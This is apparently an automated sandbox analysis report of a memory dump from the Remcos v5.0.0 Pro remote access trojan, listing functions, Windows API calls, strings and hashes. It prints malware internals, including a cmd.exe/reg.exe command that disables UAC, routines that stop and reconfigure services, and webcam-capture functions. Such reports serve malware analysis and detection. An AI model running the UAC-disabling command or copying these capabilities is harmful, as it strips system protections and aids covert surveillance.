Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Console$AllocOutputShowWindow
String ID: Remcos v$5.0.0 Pro$CONOUT$
API String ID: 2425139147-2278869229
Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E

Function 0044333A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002), ref: 0044335A
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044336D
FreeLibrary.KERNEL32(00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG), ref: 00443390

Strings

CorExitProcess, xrefs: 00443365
mscoree.dll, xrefs: 00443353
PkGNG, xrefs: 0044333C

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$PkGNG$mscoree.dll
API String ID: 4061214504-213444651
Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98

Function 0043AADC Relevance: 9.3, APIs: 6, Instructions: 284COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 0043AC69
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
__allrem.LIBCMT ref: 0043AC9C
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
__allrem.LIBCMT ref: 0043ACD1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A

Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000,?), ref: 004044C4

Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C

Strings

GetFrame, xrefs: 0040459F
HNG, xrefs: 004045E6
CloseCamera, xrefs: 0040458E
FreeFrame, xrefs: 004045B0
OpenCamera, xrefs: 00404582

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: H_prologSleep
String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
API String ID: 3469354165-3054508432
Opcode ID: 08fcd3a8c76131e8007374677ce5b6c0692de0a008e8c0ef5a68710063425739
Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
Opcode Fuzzy Hash: 08fcd3a8c76131e8007374677ce5b6c0692de0a008e8c0ef5a68710063425739
Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E

Function 004458F9 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 00445925
__cftoe.LIBCMT ref: 00445957

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 73f4726c011166e6bdcb5754414c0ade346116ed487fada7dd59cfb8b2f8224a
Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
Opcode Fuzzy Hash: 73f4726c011166e6bdcb5754414c0ade346116ed487fada7dd59cfb8b2f8224a
Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C

Function 0041AC78 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ChangeConfigManager
String ID:
API String ID: 493672254-0
Opcode ID: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
Opcode Fuzzy Hash: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE

Function 0044A004 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0044A08F
__alldvrm.LIBCMT ref: 0044A290
__alldvrm.LIBCMT ref: 0044A2B2

Strings

PkGNG, xrefs: 0044A006

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID: PkGNG
API String ID: 1036877536-263838557
Opcode ID: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
Opcode Fuzzy Hash: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A

Function 00448215 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
_free.LIBCMT ref: 0044824C
_free.LIBCMT ref: 00448274
SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
_abort.LIBCMT ref: 00448293

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD

Function 0041AAA6 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
Opcode Fuzzy Hash: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9

Function 0041ABAA Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
Opcode Fuzzy Hash: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9

Function 0041AC11 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
Opcode Fuzzy Hash: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9

Function 00442801 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

Strings

PkGNG, xrefs: 00442803

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID:
String ID: PkGNG
API String ID: 0-263838557
Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788

Function 00404CC3 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404DD2
CloseHandle.KERNEL32(?), ref: 00404DDB

Strings

PkGNG, xrefs: 00404CCC

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Create$CloseEventHandleObjectSingleThreadWait
String ID: PkGNG
API String ID: 3360349984-263838557
Opcode ID: 49fe4c89c4b53e0bfaa247814761066ed204ae0ee87e3a5f8c156f36cd8984b3
Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
Opcode Fuzzy Hash: 49fe4c89c4b53e0bfaa247814761066ed204ae0ee87e3a5f8c156f36cd8984b3
Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666

Function 0040A675 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE

Strings

XQG, xrefs: 0040A6A0

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSizeSleep
String ID: XQG
API String ID: 1958988193-3606453820
Opcode ID: 38e21002b9c7a7665831af374e9118a36682828a780468fd2ba8ddd7b6ab83cd
Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
Opcode Fuzzy Hash: 38e21002b9c7a7665831af374e9118a36682828a780468fd2ba8ddd7b6ab83cd
Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E

Function 0041D50F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON

Download Yara Rule

APIs

RegisterClassExA.USER32(00000030), ref: 0041D55B
CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
GetLastError.KERNEL32 ref: 0041D580

Strings

MsgWindowClass, xrefs: 0041D526
0, xrefs: 0041D52B

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ClassCreateErrorLastRegisterWindow
String ID: 0$MsgWindowClass
API String ID: 2877667751-2410386613
Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4

Function 00407755 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
CloseHandle.KERNEL32(?), ref: 004077AA
CloseHandle.KERNEL32(?), ref: 004077AF

Strings

C:\Windows\System32\cmd.exe, xrefs: 00407796
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess
String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
API String ID: 2922976086-4183131282
Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9

Function 00407260 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON

Download Yara Rule

Strings

SG, xrefs: 004076DA
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe, xrefs: 004076C4

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID:
String ID: SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
API String ID: 0-2032564418
Opcode ID: aeb7ec08203138e6f15c389ffc7d883b5859742f8fda7ba0964a05b6f7ae7d1f
Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
Opcode Fuzzy Hash: aeb7ec08203138e6f15c389ffc7d883b5859742f8fda7ba0964a05b6f7ae7d1f
Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E

Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EF8), ref: 00405120
SetEvent.KERNEL32(?), ref: 0040512C
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405137
CloseHandle.KERNEL32(?), ref: 00405140

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

Strings

KeepAlive | Disabled, xrefs: 004050F9

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
String ID: KeepAlive | Disabled
API String ID: 2993684571-305739064
Opcode ID: 09248d073b904291628f2a82f92fe6a987867c86155402bef043dd91105bf09b
Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
Opcode Fuzzy Hash: 09248d073b904291628f2a82f92fe6a987867c86155402bef043dd91105bf09b
Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A

Function 0041ADC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
Sleep.KERNEL32(00002710), ref: 0041AE07
PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10

Strings

Alarm triggered, xrefs: 0041ADC9

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: PlaySound$HandleLocalModuleSleepTime
String ID: Alarm triggered
API String ID: 614609389-2816303416
Opcode ID: b7b395eb2d8a8c6ac5b29d0703eec326aa80e776d4c85912c0c2915f52647228
Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
Opcode Fuzzy Hash: b7b395eb2d8a8c6ac5b29d0703eec326aa80e776d4c85912c0c2915f52647228
Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB

Function 0041CD58 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD6F
SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CDED), ref: 0041CD7C
SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD8F

Strings

______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Console$AttributeText$BufferHandleInfoScreen
String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
API String ID: 3024135584-2418719853
Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5

Function 0044139A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
Opcode Fuzzy Hash: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9

Function 00444CFB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169

_free.LIBCMT ref: 00444E06
_free.LIBCMT ref: 00444E1D
_free.LIBCMT ref: 00444E3C
_free.LIBCMT ref: 00444E57
_free.LIBCMT ref: 00444E6E

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: bf8b46b868af2ecf30d3444370171b65bdd51122b8350dbbe1b9982e260663b5
Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
Opcode Fuzzy Hash: bf8b46b868af2ecf30d3444370171b65bdd51122b8350dbbe1b9982e260663b5
Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88

Function 00449365 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
_free.LIBCMT ref: 004493BD

Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 00449589

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
